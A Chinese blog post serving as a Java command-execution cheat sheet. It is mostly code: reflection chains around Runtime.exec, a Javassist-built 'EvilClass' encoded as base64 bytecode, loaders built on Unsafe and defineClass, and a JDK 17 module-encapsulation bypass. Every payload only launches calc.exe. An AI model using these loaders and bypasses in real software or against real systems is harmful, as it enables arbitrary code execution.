命令注入(java速查)

最新推荐文章于 2025-11-25 11:29:48 发布
原创 最新推荐文章于 2025-11-25 11:29:48 发布 · 1k 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

也不说为啥审核不通过,浪费我几分钟粘贴图片
在这里插入图片描述
慢慢转微信公众号吧,我的微信公众号:ToBeHacker

命令注入

方法适用场景是否推荐
Runtime.exec()简单命令(已过时)❌ 不推荐
ProcessBuilder复杂命令(推荐)✅ 推荐
Apache Commons Exec需要高级控制(超时、流处理)⭐⭐⭐⭐
ScriptEngine执行脚本(Bash/Python)⭐⭐⭐
JNI/JNA调用本地代码⭐⭐
GraalVM跨语言执行命令⭐⭐⭐
ProcessHandle进程管理(Java 9+)⭐⭐
JSch远程 SSH 执行⭐⭐⭐⭐
Docker Java API容器内命令执行⭐⭐⭐

反射机制

Class.forName("java.lang.Runtime")
                .getMethod("getRuntime")
                .invoke(null)
                .getClass()
                .getMethod("exec", String.class)
                .invoke(Class.forName("java.lang.Runtime")
                        .getMethod("getRuntime")
                        .invoke(null), "calc.exe");

Class<?> runtimeClass = Class.forName("java.lang.Runtime");
        Method getRuntime = runtimeClass.getMethod("getRuntime");
        Object runtime = getRuntime.invoke(null);
        Method exec = runtimeClass.getMethod("exec", String.class);
        Process process = (Process) exec.invoke(runtime, "calc.exe");

Class.forName("java.lang.ProcessBuilder")
                .getConstructor(String[].class)
                .newInstance((Object)cmd)
                .getClass()
                .getMethod("start")
                .invoke(Class.forName("java.lang.ProcessBuilder")
                        .getConstructor(String[].class)
                        .newInstance((Object)new String[]{"calc.exe"}));

以上方式都是通过反射机制直接取危险类并调用,ClassLoader也是类似的,只不过是多了一道将字节码转换为类的机制。

ClassLoader

JDK9JDK16版本之中,Java.*依赖包下所有的非公共字段和方法在进行反射调用的时候,会出现关于非法反射访问的警告,但是在JDK17之后,采用的是强封装,默认情况下不再允许这一类的反射,所有反射访问java.*的非公共字段和方法的代码将抛出InaccessibleObjectException异常

利用ClassLoader来执行命令的具体步骤如下:

(1)构造恶意类

(2)生成字节码payload

(3)通过ClassLoader解析payload从而得到恶意类

(4)在实例化恶意类或调用恶意类方法来执行命令

构造恶意类
package org.example;

import java.io.IOException;

public class EvilClass {
    static {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}
生成字节码payload
public class Main {
    public static void main(String[] args) throws CannotCompileException, IOException, NotFoundException, IllegalAccessException, NoSuchFieldException, InstantiationException {
        ClassPool pool = ClassPool.getDefault();
        CtClass cc = pool.makeClass("EvilClass");

        cc.setSuperclass(pool.get("java.lang.Object"));

        // 2. 添加静态代码块(类初始化时执行)
//        CtMethod clinit = CtNewMethod.make(
        CtConstructor cons = CtNewConstructor.make(
                "public EvilClass() { " +
                        "    try { " +
                        "        Runtime.getRuntime().exec(\"calc.exe\"); " +
                        "    } catch (Exception e) { " +
                        "        throw new RuntimeException(e); " +
                        "    } " +
                        "}",
                cc
        );
        cc.addConstructor(cons);
//        cc.setModifiers(Modifier.PUBLIC);  // 设置类为public

        // 3. 生成字节码
        byte[] classBytes = cc.toBytecode();
        String base64Payload = Base64.getEncoder().encodeToString(classBytes);
        System.out.println(base64Payload);
        System.out.println();

        byte[] classBytes1 = Files.readAllBytes(Paths.get("C:\\code\\java\\demo_jdk8\\demo_jdk8\\target\\classes\\org\\example\\EvilClass.class"));
        String base64Payload1 = Base64.getEncoder().encodeToString(classBytes1);
        System.out.println(base64Payload1);
    }
}

以上展示了两种方式,第一种是直接通过源码设置类,第二种是加载恶意类的class文件,最后都会生成base64格式的字节码payload

执行命令

不同版本的jdk有不同的方式

java 1.8.0_202(jdk 8u202)

(1)unsafe方式(jdk17不可行)

public class UnsafeDemo {
    public static void main(String[] args) throws NoSuchFieldException, InstantiationException, IllegalAccessException {
        String payload = "yv66vgAAADQAKAoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAgBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABdMb3JnL2V4YW1wbGUvRXZpbENsYXNzOwEACDxjbGluaXQ+AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAB0BAApTb3VyY2VGaWxlAQAORXZpbENsYXNzLmphdmEMAAoACwcAIgwAIwAkAQAIY2FsYy5leGUMACUAJgEAE2phdmEvaW8vSU9FeGNlcHRpb24BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgwACgAnAQAVb3JnL2V4YW1wbGUvRXZpbENsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYAIQAIAAkAAAAAAAIAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAFAA4AAAAMAAEAAAAFAA8AEAAAAAgAEQALAAEADAAAAGYAAwABAAAAF7gAAhIDtgAEV6cADUu7AAZZKrcAB7+xAAEAAAAJAAwABQADAA0AAAAWAAUAAAAIAAkACwAMAAkADQAKABYADAAOAAAADAABAA0ACQASABMAAAAUAAAABwACTAcAFQkAAQAWAAAAAgAX";
        byte[] decode = Base64.getDecoder().decode(payload);
        ClassLoader classLoader=ClassLoader.getSystemClassLoader();
        Field theUafeField= Unsafe.class.getDeclaredField("theUnsafe");
        theUafeField.setAccessible(true);
        Unsafe unsafe= (Unsafe) theUafeField.get(null);
        Class<?> c2=unsafe.defineClass("org.example.EvilClass",decode,0,decode.length,classLoader,null);
        c2.newInstance();
    }
}

注意defineClass时需要输入完整类名,使用第一种方式构造paylaod的改为EvilClass即可

(2)defineAnonymousClass方式(jdk17不可行)

public class UnsafeDemo {
    public static void main(String[] args) throws NoSuchFieldException, InstantiationException, IllegalAccessException {
        String payload = "yv66vgAAADQAKAoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAgBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABdMb3JnL2V4YW1wbGUvRXZpbENsYXNzOwEACDxjbGluaXQ+AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAB0BAApTb3VyY2VGaWxlAQAORXZpbENsYXNzLmphdmEMAAoACwcAIgwAIwAkAQAIY2FsYy5leGUMACUAJgEAE2phdmEvaW8vSU9FeGNlcHRpb24BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgwACgAnAQAVb3JnL2V4YW1wbGUvRXZpbENsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYAIQAIAAkAAAAAAAIAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAFAA4AAAAMAAEAAAAFAA8AEAAAAAgAEQALAAEADAAAAGYAAwABAAAAF7gAAhIDtgAEV6cADUu7AAZZKrcAB7+xAAEAAAAJAAwABQADAA0AAAAWAAUAAAAIAAkACwAMAAkADQAKABYADAAOAAAADAABAA0ACQASABMAAAAUAAAABwACTAcAFQkAAQAWAAAAAgAX";
        byte[] decode = Base64.getDecoder().decode(payload);
        Field theUafeField=Unsafe.class.getDeclaredField("theUnsafe");
        theUafeField.setAccessible(true);
        Unsafe unsafe= (Unsafe) theUafeField.get(null);
        Class<?> c2=unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"),decode,null);
        c2.newInstance();
    }
}

(3)Method方式

public class UnsafeDemo {
    public static void main(String[] args) throws NoSuchFieldException, InstantiationException, IllegalAccessException {
        String payload = "yv66vgAAADQAKAoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAgBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABdMb3JnL2V4YW1wbGUvRXZpbENsYXNzOwEACDxjbGluaXQ+AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAB0BAApTb3VyY2VGaWxlAQAORXZpbENsYXNzLmphdmEMAAoACwcAIgwAIwAkAQAIY2FsYy5leGUMACUAJgEAE2phdmEvaW8vSU9FeGNlcHRpb24BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgwACgAnAQAVb3JnL2V4YW1wbGUvRXZpbENsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYAIQAIAAkAAAAAAAIAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAFAA4AAAAMAAEAAAAFAA8AEAAAAAgAEQALAAEADAAAAGYAAwABAAAAF7gAAhIDtgAEV6cADUu7AAZZKrcAB7+xAAEAAAAJAAwABQADAA0AAAAWAAUAAAAIAAkACwAMAAkADQAKABYADAAOAAAADAABAA0ACQASABMAAAAUAAAABwACTAcAFQkAAQAWAAAAAgAX";
        byte[] decode = Base64.getDecoder().decode(payload);
        Method method=ClassLoader.class.getDeclaredMethod("defineClass",byte[].class,int.class,int.class);
        method.setAccessible(true);
        Class cc=(Class) method.invoke(new MLet(new URL[0],Main.class.getClassLoader()), decode,new Integer(0),new Integer(decode.length));
        cc.newInstance();
    }
}
java 17.0.10

通过修改当前类的module为java.base保持和java.lang.ClassLoader同module下,从而完成绕过:

public class ReflectDemo {
    public static void main(String[] args) throws NoSuchFieldException, InstantiationException, IllegalAccessException {
        String payload = "yv66vgAAADQAKAoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAgBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABdMb3JnL2V4YW1wbGUvRXZpbENsYXNzOwEACDxjbGluaXQ+AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAB0BAApTb3VyY2VGaWxlAQAORXZpbENsYXNzLmphdmEMAAoACwcAIgwAIwAkAQAIY2FsYy5leGUMACUAJgEAE2phdmEvaW8vSU9FeGNlcHRpb24BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgwACgAnAQAVb3JnL2V4YW1wbGUvRXZpbENsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYAIQAIAAkAAAAAAAIAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAFAA4AAAAMAAEAAAAFAA8AEAAAAAgAEQALAAEADAAAAGYAAwABAAAAF7gAAhIDtgAEV6cADUu7AAZZKrcAB7+xAAEAAAAJAAwABQADAA0AAAAWAAUAAAAIAAkACwAMAAkADQAKABYADAAOAAAADAABAA0ACQASABMAAAAUAAAABwACTAcAFQkAAQAWAAAAAgAX";
        byte[] decode = Base64.getDecoder().decode(payload);
        Field field= Unsafe.class.getDeclaredField("theUnsafe");
        field.setAccessible(true);
        Unsafe unsafe=(Unsafe) field.get(null);
        Module baseModule=Object.class.getModule();
        Class currentClass= ReflectDemo.class;
        long offset= unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
        unsafe.putObject(currentClass, offset, baseModule);
        Method method=ClassLoader.class.getDeclaredMethod("defineClass",byte[].class,int.class,int.class);
        method.setAccessible(true);
        ((Class)method.invoke(ClassLoader.getSystemClassLoader(), decode,0, decode.length)).newInstance();
    }
}

注意,使用unsafe修改Module修改的是当前ReflectDemo的Module,因此Class currentClass= ReflectDemo.class;并不是随便选个类就可以的

Runtime

Process process = Runtime.getRuntime().exec("cmd.exe /c calc");
int exitCode = process.waitFor();
System.out.println("退出码: " + exitCode);

ProcessBuilder

ProcessBuilder pb = new ProcessBuilder("cmd.exe", "/c", "calc");
Process process = pb.start();
int exitCode = process.waitFor();

commandLine

<dependency>
			<groupId>org.apache.commons</groupId>
			<artifactId>commons-exec</artifactId>
			<version>1.3</version>
</dependency>

CommandLine cmd = new CommandLine("cmd.exe");
cmd.addArgument("/c");
cmd.addArgument("calc");
DefaultExecutor executor = new DefaultExecutor();
int exitCode = executor.execute(cmd);

ScriptEngine(java 15以下)

无需额外引入依赖

ScriptEngineManager manager = new ScriptEngineManager();
ScriptEngine engine = manager.getEngineByName("JavaScript");
engine.eval("var rt = Java.type('java.lang.Runtime');" +
                    "rt.getRuntime().exec('calc');");

GraalVME(java15及以上)

<dependency>
			<groupId>org.graalvm.js</groupId>
			<artifactId>js</artifactId>
			<version>24.1.1</version>
		</dependency>
		<dependency>
			<groupId>org.graalvm.js</groupId>
			<artifactId>js-scriptengine</artifactId>
			<version>24.1.1</version>
</dependency>

Context context = Context.newBuilder()
                .allowAllAccess(true)  // 允许访问所有 Java 类
                .build();
context.eval("js", "const Runtime = Java.type('java.lang.Runtime');");
        context.eval("js", "Runtime.getRuntime().exec('calc');");

java的一些概念

模块系统的访问限制(Java 9及以后版本)

module java.base does not "opens java.lang" to unnamed module 是 Java 9+ 模块系统(JPMS)的强封装性导致的典型错误。其核心原因是:未命名模块(Unnamed Module)尝试通过反射访问 java.base 模块中未开放的 java.lang

每个模块需声明其导出(exports)和开放(opens)的包:

module java.base {
    exports java.lang; // 默认导出,但未开放反射
}

意味着java.base模块不允许通过反射去访问java.lang包下面的类及成员

在 Java 9 之前,反射可无限制访问包内所有类及其成员(包括 private 类型),类信息并未真正隔离。模块系统(module-info.java)通过强封装实现以下改进:

  • 默认隐藏:模块内类默认对外不可见,仅显式导出的 public 类可被访问
  • 精准开放:通过 exports 指定对外暴露的包,opens 指令控制反射访问范围,避免过度暴露内部实现
  • 运行时限制:未开放包的反射访问会触发 IllegalAccessException,需通过 --add-opens 参数或模块声明开放权

exports 允许访问 public 成员,但无法访问 privateprotected 成员,而opens允许反射访问所有成员,允许通过 setAccessible(true) 绕过访问控制

其他指令:

  • requires:requires 指令允许模块声明运行时或编译时需要依赖的其他模块,若未声明依赖,编译时报错 module not found,运行时抛出 ClassNotFoundException

  • provides:允许模块声明自己实现了某个服务接口,并指定具体的实现类。其他模块可通过 ServiceLoader 动态发现并加载这些实现,实现松耦合的插件化架构

  • opens to:允许开发者精确指定哪些模块可以通过反射访问当前模块的特定包(包括私有成员),同时保持其他模块的访问限制,对于以下:

    opens <package-name> to <module1>, <module2>;

    代表module1、module2允许通过反射直接访问

@CallerSensitive

@CallerSensitive 标记的方法会 跳过当前栈帧,直接检查调用该方法的上层代码(真正的调用者)的权限,而不是方法内部的代码权限。

主要用于:

  • Class.forName()(类加载)
  • Method.invoke()(反射调用)
  • Unsafe 相关操作
  • ClassLoader.defineClass()(动态加载类)

Unsafe 修改类模块的原理

Java对象在内存中由对象头实例数据区组成。Unsafe通过以下步骤定位字段:

  • 获取对象基地址:对象实例的起始内存地址。
  • 计算字段偏移量:使用objectFieldOffset()方法获取字段在对象实例数据区中的偏移量。
  • 直接内存操作:通过基地址+偏移量定位字段内存位置,直接读写数据

而且Java的privateprotected等修饰符在Unsafe中被无视,可以通过偏移量直接读写内存,无需通过Java的getter/setter方法

Unsafe提供类加载相关的底层API:

  • 动态定义类:通过defineClass()方法直接加载字节码,绕过类加载器。
  • 修改类元数据:直接操作类对象的内存,改变类的结构或方法实现

参考

SQL注入速查笔记
10-22 4万+
SQL 注入分类方式: 提交方式:GET POST COOKIE 参数注入:数字型/字符型/搜索型 数据库类型:ACCESS/Mysql/MSSQL/Oracle 手工注入方法:联合查询、报错注入、盲注(基于布尔型、基于时间延迟) 0x01、Mysql Mysql划分:权限 root 普通用户 版本 mysql>5.0 mysql<5.0 1.1 root权限 lo...
[Java]MyBatis学习笔记及速查手册
身披白袍的博客
06-13 481
MyBatis 手动编写 SQL,支持动态 SQL、处理列表、动态生成表名、支持存储过程
Java命令注入_Java防止路径操控和命令注入 代码
weixin_26795617的博客
02-12 927
public class Test{public static void main(String[] args){System.out.println(getSafeCommand("abcd&efg"));System.out.println(getSafePath("abcd/efg"));}/*** Get the safe path* @param filePath Enter t...
java 命令注入攻击_Java编程安全漏洞之:注入漏洞
weixin_34175919的博客
02-13 1835
SQL_InjectionSQL查询语句注入,来自用户的数据通过字符串拼接的方式构筑到SQL语句中。修复建议使用带占位符的预编译执行方式的SQL语句,并且,所有非程序自身的数据都不参与SQL语句的构成。修复示例如:public void SQL_Injection(HttpServletRequest request, Connection c){String text = request.get...
Java命令注入_java代码审计 命令注入 及 修复建议
weixin_42416398的博客
02-12 1322
命令注入:是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。在Web应用中,有时候会用到一些命令执行的函数,如php中system、exec、shell_exec等,当对用户输入的命令没有进行限制或者过滤不严导致用户可以执行任意命令时,就会造成命令执行漏洞。命令注入漏洞主要表现为以下两种形式:1、攻击者能够算改程序执行的命令:攻击者直接控制了所执行的命令。2、攻击者能够复改命...
java入参为方法_Java命令注入原理结合Java Instrument技术(FreeBuf首发)
weixin_39633452的博客
01-25 720
一、前言命令注入:恶意用户构造恶意请求,对一些执行系统命令的功能点进行构造注入,从而达到执行命令的效果。二、演示环境搭建这里采用springboot+swagger搭建一个模拟的web环境:启动成功后访问:http://localhost:8090/swagger-ui.html#/command主要有三个接口:1 /command/exec/string 主要实现Runtime.get...
SQL 注入速查表大全
开发猫
10-21 1672
  SQL防注入大全——史上最全的 SQL 注入资料   什么是 SQL 注入速查表? SQL注入速查表是可以为你提供关于不同种类 SQL注入漏洞 的详细信息的一个资源。这份速查表对于经验丰富的渗透测试人员,或者刚开始接触 Web应用安全 的初学者,都是一份很好的参考资料。   关于这份 SQL 注入速查表   这份 SQL 速查表最初是 2007 年时 Ferruh Mavi...
红队常用命令速查
热门推荐
诚邀网络通信领域商务合作
10-23 2万+
红队常用命令
arthas操作spring被代理目标对象命令速查
大鱼化蝶的传说
09-20 1625
会得到,classLoaderHash 69c112b6,然后执行获取到的spring被代理的目标对象的方法。如果没有beanUtils工具类,还可以通过vmtool命令。2.通过vmtool重新消费消息。获取类加载器hash值,同上。获取类加载器hash值,同上。1.通过ognl重新消费消息。附:beanUtils工具类。
Springboot简洁速查
学习笔记
11-08 1124
springboot随记 参考自http://c.biancheng.net/spring_boot/ 文章目录springboot随记父项目依赖管理YAMLSpring Boot配置绑定@ConfigurationProperties@Value:@PropertySourceSpring Boot导入Spring配置@ImportResource@Configuration 与 @BeanSpring Boot Profile(多环境配置)Spring Boot默认配置文件Spring Boot外部
Java全能速查宝典
04-29
根据提供的文件信息,“Java全能速查宝典”似乎是一本专注于Java编程语言的参考资料书籍或文档。虽然实际的内容并未给出,但从标题、描述以及部分显示的内容来看,我们可以推测这本书主要涵盖了Java编程的基础知识、...
PHP7.2与Linux常用命令速查手册
命令手册”说明文档具有高度实用性,可能采用速查表形式列出常用指令及其参数解释。“Web开发”突出了应用场景,涉及表单处理、会话管理(Session/Cookie)、文件上传、URL重写、RESTful接口设计等典型任务。...
Java高级知识点速查手册:面试复习必备
该压缩包文件“java高级知识点快速复习.zip”是一个专为具备一定Java基础的开发者设计的知识点速查手册,适用于在已有知识体系的基础上进行高效复习,尤其适合面试前的集中回顾与巩固。其核心内容涵盖Java开发中多个...
平台政策频变,跨境卖家如何筑牢安全防线?
最新发布
2501_93135886的博客
11-25 298
跨境电商正在进入精细化运营的新阶段,卖家需要在把握平台政策导向的同时,建立完善的风险防御体系,通过合规经营、供应链优化和安全管理,构建可持续的竞争壁垒,在这个快速变化的环境中,只有适应变革、主动求变的卖家,才能赢得长期发展的机会。针对这类风险,卖家需要建立更严谨的证据管理机制,从产品出厂到发货的每个环节都应保留完整的影像资料,形成可追溯的证据链,在处理客户投诉时,要求提供多角度证据或视频资料,能够有效识别AI生成的虚假内容。
人工智能时代:以备案制度筑牢安全防线
qq_58995858的博客
11-24 318
人工智能技术快速发展带来安全隐患,如自动驾驶事故、算法歧视等问题凸显。国家出台备案制度,要求AI产品提交技术资料和数据样本,增强透明度。该制度通过算法可解释性、公平性评估等机制,有效降低技术风险,提升用户信任。备案不仅是合规要求,更是构建数字时代信任基石的关键举措,将推动AI行业健康有序发展。
云原生安全
2509_93947362的博客
11-24 348
先聊聊容器安全这块硬骨头。另外,容器运行时也得盯紧,像Falco这种开源工具能实时监测异常操作,比如突然冒出的特权容器或者敏感目录访问,一有风吹草动就告警。云平台的原生安全工具也得用起来,比如AWS的Security Group和Azure的NSG,规则要最小权限原则,只开放必要端口。说实话,刚开始推行时总有人抱怨流程繁琐,等真防住几次零日漏洞攻击后,全员才意识到:云原生安全就是个持续博弈的过程,今天偷懒省一步,明天就可能全线崩盘。总之,云原生安全没有银弹,它得像编织渔网一样,把技术、流程、文化三层织密。
【2025-11-23】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
jenchoi413的博客
11-24 419
2025年11月23日共发布14条漏洞预警,包括11条CVE漏洞和3条供应链投毒预警。CVE漏洞涉及Ashraf Kabir旅行社系统(5.3-5.1中危)、D-Link路由器(7.4高危)和Campcodes管理系统(6.9中危),主要风险为SQL注入和缓冲区溢出。供应链投毒预警包括PyPI的nspacercesolve组件窃取敏感信息、NPM的ddos-hunter组件勒索行为以及session-keeper等组件内嵌后门,影响多个版本。建议用户及时排查相关组件,高危漏洞需优先修复。
【2025-11-19】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
jenchoi413的博客
11-21 562
2025年11月19日新增91条漏洞预警,其中商业软件漏洞63条,供应链投毒28条。重点漏洞包括:Eclipse Jersey竞争条件漏洞(9.4分高危),可能导致SSL配置失效;Fortinet系列产品多漏洞,其中FortiVoice存在SQL注入(8.8分高危),FortiWeb存在命令注入(7.2分高危);Checkmk监控平台存在权限验证不足问题(5.3分中危)。建议优先修复Eclipse Jersey和Fortinet产品的高危漏洞,其他中低危漏洞可根据实际情况选择修复。
智能治理,安全升级——ANSNP中线电流综合治理方案
安科瑞袁媛的博客
11-25 379
随着电力电子类设备在社会中的使用范围越来越大,在各种工业,商业和民用应用领域中非线性负载的大量使用以及三相不平衡等问题的存在会导致中性线电流过大,容易引起中性线绝缘层老化起火从而引发火灾,存在较大的安全隐患。据2021年1-10月份全国火灾形势报告显示,在1-10月份火灾事故中,电气火灾占据了火灾总数的50.4%, 其中电气线路是电气火灾中最主要的起火源,所占的比例高达60%以上是防范的重点,其中由于中性线导致的起火数量占有不小比例,所以治理中性线电流过大问题是非常有必要的。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值